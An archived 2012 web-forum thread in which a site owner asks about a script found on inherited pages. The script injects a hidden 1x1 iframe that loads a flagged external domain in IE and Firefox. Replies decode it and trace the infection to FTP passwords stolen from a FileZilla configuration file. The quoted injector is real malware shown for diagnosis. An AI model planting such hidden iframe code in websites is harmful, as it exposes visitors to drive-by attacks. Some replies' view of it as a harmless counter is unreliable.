homepage Welcome to WebmasterWorld Guest from 54.197.19.35
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque & physics

Webmaster General Forum

    
What is the function of this script in a website I'm inheriting
Concerned because it contains a url to a 'known attack site'
Anonymoose




msg:4468872
 12:43 pm on Jun 24, 2012 (gmt 0)

A set of websites I inherited have a script on them that worries me. I suspect he used it to generate page stats, but am not certain. If so, why is the url to a known attack site according to a couple of security programs. I would have assumed that the ISP would generate extensive stats that could be used and wouldn't require a separate URL? The ISP is web66.com The offending url is onmouseup.info.

If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Regardless, here's the script- I hope it posts properly...

<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

I'll be most grateful to anyone who can shed some meaningful light on this.

 

lucy24




msg:4469004
 10:09 pm on Jun 24, 2012 (gmt 0)

If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Obvious question first: Is this behavior exactly the same, whether or not you are in fact using MSIE || Firefox?

:: wandering off thinking evil thoughts about buggy site whose webmaster went AWOL in 2009 ::

Anonymoose




msg:4469014
 10:38 pm on Jun 24, 2012 (gmt 0)

Lucy24, I don't understand your question? I was using HTML-Kit to edit the source code on a copy of the site that I'd downloaded to my computer. When I deleted that script just to see what if anything would change on the page, ALL of the page coding disappeared too (from the html editing panel). Of course I could just hit 'undo' and have it all back - including the questionable script. That behavior made me even more suspicious that it's somehow malicious coding - why won't it let me delete the script just to see the effect on the site?

Maybe it's innocuous and I'm just too green, but that it contains the url to a known attack site, and appears to be hidden, and won't let me delete it without deleting the entire page all makes me suspicious so I'm trying to find out what's going on...

Anonymoose




msg:4469031
 11:54 pm on Jun 24, 2012 (gmt 0)

Now I'm more perplexed - just went back into the index page using HTTrack as editor, and this time it let me delete the script without problem.

I'd still like to know what the script is supposed to do, how it affects people surfing the site, and how to clean it thoroughly from the sites assuming it is malicious.

Shotgunning on the web, I did find it as malicious on Sucuri Malware Labs (http://labs.sucuri.net/?details=onmouseup.info) but I have no idea how reputable they are or aren't, and it provides zero information about what this script does.

g1smd




msg:4469036
 12:17 am on Jun 25, 2012 (gmt 0)

"If the visiting UA is Firefox or MSIE, append an invisible 1 pixel iframe to the body, position it top left on screen, and within it load something which counts this pageview."

Anonymoose




msg:4469042
 1:06 am on Jun 25, 2012 (gmt 0)

Ok... and thank you for the code to english translation!

Any idea why would it do that, and why is it considered to be malicious? What harm does or can it do to site visitors or site integrity? The hosting company wouldn't be using a known attack site to track page views for basic website stats, would they? Or maybe the webmaster was using an outside source for site stats and didn't realize that it's had problems with attack code of some sort?

lucy24




msg:4469079
 3:32 am on Jun 25, 2012 (gmt 0)

What does

<!--/c3284d-->

mean? Or is it just a cross-reference to something like the counter number?

More to the point: Why do they need to do all that "createElement('iframe')" and "getElementsByTagName" business instead of just shoving in a 1x1 transparent gif like the rest of us? For that matter, why even bother to check UA? Wouldn't it be easier to pull all the data and then delete the webkits and operas at your leisure?

Anonymoose




msg:4469081
 4:10 am on Jun 25, 2012 (gmt 0)

Lucy24, your guess is as good as mine on the <!--/c3284d-->. Looks like an html comment, but what the heck it means or why it's there I have no clue and wondered also. There are a couple more of them in the same vicinity - no idea if the current guy put them there, or maybe it's something HTTrack does when downloading a site? (doubt it)...

Anyhow, I figured that was less important than the script issue by far. I posted that over at https://badwarebusters.org/main/itemview/29499?t=5821#itemblock-29501 also. A moderator there also said its malicious (but not why). If I understand his reply correctly, he's saying that the thing downloads the entire contents (whatever that may be) of that onmouseup.info page anytime a webpage with that script is loaded in IE or Firefox....

So I'm still confused about how it would have gotten there and exactly what it's supposed to do.

Leosghost




msg:4469096
 6:26 am on Jun 25, 2012 (gmt 0)

Guessing it is c <= counter 3284 <= counter number d <= reference of some sort..in a comment

It doesn't download the entire contents of the other site page..it does what g1smd says it does..it loads a single pixel and counts how many times it loads it..

It could do other stuff ( which could be malicious if set up right )..but at the moment it isn't..

tiger




msg:4470065
 1:22 pm on Jun 27, 2012 (gmt 0)

Hi all
I have the same problem on my website

I found every index.asp or index.aspx pages was infested by the code in the first post. I have removed the code but Google is telling mne there is a malware. Perhaps occur some days to back to the orihginal status.
I have found the problem. It is by steal your password in FTP client(I use Filezilla) so a post that explain in detailed manner this is here

[edited by: engine at 3:36 pm (utc) on Jun 27, 2012]
[edit reason] removed links to protect others from potential malware [/edit]

tiger




msg:4470162
 4:04 pm on Jun 27, 2012 (gmt 0)

Excuse me for post link on my website enterely, however the second was good for explaininmg the problem. The problem is in account FTP of filezilla this file: sitemanager.xml located in

users/user/AppData/FileZilla

change FTP password

jimbeetle




msg:4470268
 9:43 pm on Jun 27, 2012 (gmt 0)

change FTP password

And give the machine you use for FTP a good scrub, it might have been infected by a keylogger.

tiger




msg:4470363
 8:38 am on Jun 28, 2012 (gmt 0)

Yes infact the best is a method to crypt FTP file with software truecrypt. I have a problem with my PC but on my Virtual machine it works. So I advice thi:s in this manner sitemanager.xml is crypted and the the file is deleted once you have uploaded the files.
In the meanwhile my website is comeback to normal

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved